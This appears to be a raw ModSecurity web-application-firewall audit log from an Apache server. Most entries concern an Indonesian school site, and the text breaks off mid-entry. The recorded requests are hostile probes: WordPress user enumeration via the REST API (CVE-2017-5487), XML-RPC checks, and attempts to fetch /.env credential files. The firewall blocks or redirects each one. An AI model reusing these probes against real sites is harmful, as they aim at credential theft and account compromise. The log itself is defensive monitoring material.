[rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747430068113821 2905 (- - -) Stopwatch2: 1747430068113821 2905; combined=1275, p1=456, p2=788, p3=0, p4=0, p5=31, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88a9185c-Z-- --a7ed9f2b-A-- [17/May/2025:04:14:33 +0700] aCequXyxdQCiyU1ENFch4wAAABQ 103.236.140.4 55756 103.236.140.4 8181 --a7ed9f2b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.96 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a7ed9f2b-C-- demo.sayHello --a7ed9f2b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7ed9f2b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747430073385563 5672 (- - -) Stopwatch2: 1747430073385563 5672; combined=4159, p1=565, p2=3377, p3=31, p4=35, p5=90, sr=78, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7ed9f2b-Z-- --fe066478-A-- [17/May/2025:04:16:15 +0700] aCerH3yxdQCiyU1ENFch6wAAAAk 103.236.140.4 55774 103.236.140.4 8181 --fe066478-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fe066478-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe066478-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747430175019148 2786 (- - -) Stopwatch2: 1747430175019148 2786; combined=1232, p1=427, p2=775, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe066478-Z-- --1468d63e-A-- [17/May/2025:04:16:21 +0700] aCerJXyxdQCiyU1ENFch7QAAAAw 103.236.140.4 55778 103.236.140.4 8181 --1468d63e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.178 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1468d63e-C-- demo.sayHello --1468d63e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1468d63e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747430181078320 5655 (- - -) Stopwatch2: 1747430181078320 5655; combined=4134, p1=543, p2=3367, p3=32, p4=35, p5=93, sr=80, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1468d63e-Z-- --b41a1537-A-- [17/May/2025:04:18:55 +0700] aCervwTOsBn9MSWb6WJp3QAAAIk 103.236.140.4 55794 103.236.140.4 8181 --b41a1537-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 123.51.159.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 123.51.159.44 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b41a1537-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b41a1537-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747430335352823 3082 (- - -) Stopwatch2: 1747430335352823 3082; combined=1290, p1=436, p2=825, p3=0, p4=0, p5=28, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b41a1537-Z-- --97501059-A-- [17/May/2025:04:22:41 +0700] aCesoXyxdQCiyU1ENFch9AAAAAE 103.236.140.4 55822 103.236.140.4 8181 --97501059-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.228 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --97501059-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97501059-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747430561348021 3255 (- - -) Stopwatch2: 1747430561348021 3255; combined=1428, p1=494, p2=901, p3=0, p4=0, p5=32, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97501059-Z-- --b83b4c7e-A-- [17/May/2025:04:22:49 +0700] aCesqXyxdQCiyU1ENFch9QAAAAI 103.236.140.4 55826 103.236.140.4 8181 --b83b4c7e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.228 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b83b4c7e-C-- demo.sayHello --b83b4c7e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b83b4c7e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747430569279644 6449 (- - -) Stopwatch2: 1747430569279644 6449; combined=4645, p1=625, p2=3779, p3=38, p4=43, p5=97, sr=79, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b83b4c7e-Z-- --e9eb3660-A-- [17/May/2025:04:28:33 +0700] aCeuAXyxdQCiyU1ENFciEgAAAA0 103.236.140.4 55896 103.236.140.4 8181 --e9eb3660-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.135 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e9eb3660-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9eb3660-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747430913508227 2832 (- - -) Stopwatch2: 1747430913508227 2832; combined=1479, p1=512, p2=936, p3=0, p4=0, p5=31, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9eb3660-Z-- --355e7248-A-- [17/May/2025:04:28:38 +0700] aCeuBnyxdQCiyU1ENFciFAAAABI 103.236.140.4 55900 103.236.140.4 8181 --355e7248-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.135 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --355e7248-C-- demo.sayHello --355e7248-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --355e7248-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747430918360756 5246 (- - -) Stopwatch2: 1747430918360756 5246; combined=3954, p1=528, p2=3214, p3=28, p4=31, p5=90, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --355e7248-Z-- --e6bb7230-A-- [17/May/2025:04:35:50 +0700] aCevtgTOsBn9MSWb6WJp8AAAAJM 103.236.140.4 56000 103.236.140.4 8181 --e6bb7230-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 139.59.136.184 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 139.59.136.184 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --e6bb7230-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6bb7230-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747431350891846 886 (- - -) Stopwatch2: 1747431350891846 886; combined=366, p1=331, p2=0, p3=0, p4=0, p5=35, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6bb7230-Z-- --90f4440a-A-- [17/May/2025:04:36:44 +0700] aCev7BKi5m5upc8uMd6eIAAAAMg 103.236.140.4 56012 103.236.140.4 8181 --90f4440a-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --90f4440a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90f4440a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747431404051215 897 (- - -) Stopwatch2: 1747431404051215 897; combined=318, p1=280, p2=0, p3=0, p4=0, p5=38, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90f4440a-Z-- --86f2965d-A-- [17/May/2025:04:36:44 +0700] aCev7HyxdQCiyU1ENFciHQAAAAU 103.236.140.4 56016 103.236.140.4 8181 --86f2965d-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --86f2965d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86f2965d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747431404130579 705 (- - -) Stopwatch2: 1747431404130579 705; combined=271, p1=234, p2=0, p3=0, p4=0, p5=37, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86f2965d-Z-- --6e767d4f-A-- [17/May/2025:04:36:44 +0700] aCev7ATOsBn9MSWb6WJp-AAAAIU 103.236.140.4 56020 103.236.140.4 8181 --6e767d4f-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --6e767d4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e767d4f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747431404391178 748 (- - -) Stopwatch2: 1747431404391178 748; combined=317, p1=285, p2=0, p3=0, p4=0, p5=32, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e767d4f-Z-- --ebd1a447-A-- [17/May/2025:04:41:00 +0700] aCew7BKi5m5upc8uMd6eJwAAANE 103.236.140.4 56046 103.236.140.4 8181 --ebd1a447-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.164 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ebd1a447-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebd1a447-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747431660685614 3532 (- - -) Stopwatch2: 1747431660685614 3532; combined=1583, p1=599, p2=947, p3=0, p4=0, p5=37, sr=165, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebd1a447-Z-- --450b5140-A-- [17/May/2025:04:41:07 +0700] aCew83yxdQCiyU1ENFciHwAAAAc 103.236.140.4 56050 103.236.140.4 8181 --450b5140-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.164 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --450b5140-C-- demo.sayHello --450b5140-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --450b5140-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747431667293513 4715 (- - -) Stopwatch2: 1747431667293513 4715; combined=3688, p1=449, p2=3038, p3=25, p4=24, p5=90, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --450b5140-Z-- --d5b26335-A-- [17/May/2025:04:42:22 +0700] aCexPnyxdQCiyU1ENFciJAAAAA4 103.236.140.4 56066 103.236.140.4 8181 --d5b26335-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.78.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.78.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d5b26335-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5b26335-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747431742693873 3280 (- - -) Stopwatch2: 1747431742693873 3280; combined=1426, p1=499, p2=895, p3=0, p4=0, p5=32, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5b26335-Z-- --07e9b347-A-- [17/May/2025:04:42:27 +0700] aCexQ3yxdQCiyU1ENFciJgAAABE 103.236.140.4 56070 103.236.140.4 8181 --07e9b347-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.14 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --07e9b347-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07e9b347-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747431747778561 2544 (- - -) Stopwatch2: 1747431747778561 2544; combined=1220, p1=394, p2=795, p3=0, p4=0, p5=31, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07e9b347-Z-- --850fed58-A-- [17/May/2025:04:42:27 +0700] aCexQ3yxdQCiyU1ENFciJwAAAA8 103.236.140.4 56072 103.236.140.4 8181 --850fed58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.78.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.78.80 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --850fed58-C-- demo.sayHello --850fed58-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --850fed58-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747431747943060 4561 (- - -) Stopwatch2: 1747431747943060 4561; combined=3630, p1=434, p2=2945, p3=24, p4=25, p5=140, sr=84, sw=62, l=0, gc=0 Producer: ModSecurity for 